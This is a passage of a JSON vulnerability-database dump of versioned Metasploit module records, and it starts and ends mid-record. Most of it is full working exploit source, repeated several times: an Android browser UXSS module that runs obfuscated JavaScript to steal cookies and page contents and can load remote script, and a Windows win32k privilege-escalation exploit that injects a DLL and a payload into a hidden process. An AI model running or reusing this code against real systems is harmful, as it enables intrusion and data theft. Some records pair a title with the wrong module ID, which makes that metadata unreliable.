HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-09T00:24:11", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 72}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "309300c36aeb6881690130ab30ee1014", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows TrackPopupMenu Win32k NULL Pointer Dereference", "description": "This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.\n", "published": "2014-10-23T23:51:30", "modified": "2018-10-28T00:54:14", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4113", "http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/"], "cvelist": ["CVE-2014-4113"], "lastseen": "2019-06-13T16:39:59", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-06-13T16:39:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-4113"]}, {"type": "seebug", "idList": ["SSV:90702", "SSV:87348"]}, {"type": "symantec", "idList": ["SMNTC-70364"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131964", "PACKETSTORM:128861", "PACKETSTORM:149689", "PACKETSTORM:151182"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/MS14_058_TRACK_POPUP_MENU", "MSF:EXPLOIT/MULTI/HTTP/OPMANAGER_SOCIALIT_FILE_UPLOAD", "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION_JUICY", "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION"]}, {"type": "exploitdb", "idList": ["EDB-ID:46945", "EDB-ID:39666", "EDB-ID:35101", "EDB-ID:37064", "EDB-ID:42556", "EDB-ID:45562"]}, {"type": "thn", "idList": ["THN:2A7DE929E5909B366E6F490ABBF0A6C1", "THN:675EE08758C0AD2D11F9BC33AB15EA32", "THN:083E49FCE8774369B5F2FAEDBE3F18A3"]}, {"type": "zdt", "idList": ["1337DAY-ID-32825", "1337DAY-ID-23642", "1337DAY-ID-22805", "1337DAY-ID-25556"]}, {"type": "threatpost", "idList": ["THREATPOST:720727931BBA026660C91151A9F50C2F", "THREATPOST:6D624865424D6B497F552030FAE6A7EE", "THREATPOST:2DE43487E2CDBEABD59D64B1DC7CE12C", "THREATPOST:6FD1BE58563D8C80AD13206713C5B06D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783863"]}, {"type": "nessus", "idList": ["SMB_NT_MS14-058.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804859"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14016"]}, {"type": "kaspersky", "idList": ["KLA10601"]}], "modified": "2019-06-13T16:39:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms14_058_track_popup_menu.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',\n 'Description' => %q{\n This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability\n can be triggered through the use of TrackPopupMenu. Under special conditions, the\n NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary\n code execution. This module has been tested successfully on Windows XP SP3, Windows\n 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows\n 2008 R2 SP1 64 bits.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # vulnerability discovery and exploit in the wild\n 'juan vazquez', # msf module (x86 target)\n 'Spencer McIntyre', # msf module (x64 target)\n 'OJ Reeves <oj[at]buffered.io>'\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' =>\n [\n # Tested on (32 bits):\n # * Windows XP SP3\n # * Windows 2003 SP2\n # * Windows 7 SP1\n # * Windows 2008\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n # Tested on (64 bits):\n # * Windows 7 SP1\n # * Windows 2008 R2 SP1\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' =>\n {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['CVE', '2014-4113'],\n ['OSVDB', '113167'],\n ['BID', '70364'],\n ['MSB', 'MS14-058'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']\n ],\n 'DisclosureDate' => 'Oct 14 2014',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n },\n }))\n end\n\n def check\n os = sysinfo[\"OS\"]\n\n if os !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n if sysinfo[\"Architecture\"] =~ /(wow|x)64/i\n arch = ARCH_X64\n elsif sysinfo[\"Architecture\"] == ARCH_X86\n arch = ARCH_X86\n end\n\n file_path = expand_path(\"%windir%\") << \"\\\\system32\\\\win32k.sys\"\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n # Neither target suports Windows 8 or 8.1\n return Exploit::CheckCode::Safe if build == 9200\n return Exploit::CheckCode::Safe if build == 9600\n\n return Exploit::CheckCode::Appears if [2600, 3790, 7600, 7601].include?(build)\n\n return Exploit::CheckCode::Unknown\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, \"Exploit not available on this system.\")\n end\n\n if sysinfo[\"Architecture\"] =~ /wow64/i\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo[\"Architecture\"] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo[\"Architecture\"] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Reader Sandbox won't allow to create a new process:\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n if target.arch.first == ARCH_X86\n dll_file_name = 'cve-2014-4113.x86.dll'\n else\n dll_file_name = 'cve-2014-4113.x64.dll'\n end\n\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-13T16:39:59", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 73}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-14T04:40:32", "history": [], "viewCount": 72, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-06-14T04:40:32"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891816", "OPENVAS:1361412562310891817", "OPENVAS:1361412562310883064", "OPENVAS:1361412562310883062", "OPENVAS:1361412562310852553", "OPENVAS:1361412562310883063", "OPENVAS:1361412562310852552", "OPENVAS:1361412562310844048", "OPENVAS:1361412562310852551", "OPENVAS:1361412562310844046"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8"]}], "modified": "2019-06-14T04:40:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-14T04:40:32", "differentElements": ["sourceData"], "edition": 74}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-16T03:08:17", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-06-16T03:08:17"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876491", "OPENVAS:1361412562310876483", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876481", "OPENVAS:1361412562310876488", "OPENVAS:1361412562310876482", "OPENVAS:1361412562310876480", "OPENVAS:1361412562310876489", "OPENVAS:1361412562310876490", "OPENVAS:1361412562310876487"]}, {"type": "mozilla", "idList": ["MFSA2019-17"]}], "modified": "2019-06-16T03:08:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-16T03:08:17", "differentElements": ["sourceData"], "edition": 75}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-16T13:39:27", "history": [], "viewCount": 72, "enchantments": {"score": {"value": -1.0, "vector": "NONE", "modified": "2019-06-16T13:39:27"}, "dependencies": {"references": [{"type": "freebsd", "idList": ["82C07DFA-9016-11E9-AF2F-712C38AA3E4C"]}, {"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865", "1337DAY-ID-32866"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876483", "OPENVAS:1361412562310876491", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876482", "OPENVAS:1361412562310876489", "OPENVAS:1361412562310876481", "OPENVAS:1361412562310876488", "OPENVAS:1361412562310876480", "OPENVAS:1361412562310876487", "OPENVAS:1361412562310876479"]}, {"type": "mozilla", "idList": ["MFSA2019-17"]}], "modified": "2019-06-16T13:39:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-16T13:39:27", "differentElements": ["sourceData"], "edition": 76}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-17T12:36:38", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-06-17T12:36:38"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704464", "OPENVAS:1361412562310891819", "OPENVAS:1361412562310891822", "OPENVAS:1361412562310891818", "OPENVAS:1361412562310704463", "OPENVAS:1361412562310704462", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876491", "OPENVAS:1361412562310876483", "OPENVAS:1361412562310876489"]}, {"type": "freebsd", "idList": ["82C07DFA-9016-11E9-AF2F-712C38AA3E4C"]}, {"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865", "1337DAY-ID-32866"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}], "modified": "2019-06-17T12:36:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T12:36:38", "differentElements": ["sourceData"], "edition": 77}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-17T14:33:47", "history": [], "viewCount": 73, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2019-06-17T14:33:47"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704464", "OPENVAS:1361412562310891819", "OPENVAS:1361412562310891822", "OPENVAS:1361412562310891818", "OPENVAS:1361412562310704463", "OPENVAS:1361412562310704462", "OPENVAS:1361412562310876483", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876491", "OPENVAS:1361412562310876488"]}, {"type": "freebsd", "idList": ["82C07DFA-9016-11E9-AF2F-712C38AA3E4C"]}, {"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865", "1337DAY-ID-32866"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}], "modified": "2019-06-17T14:33:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to 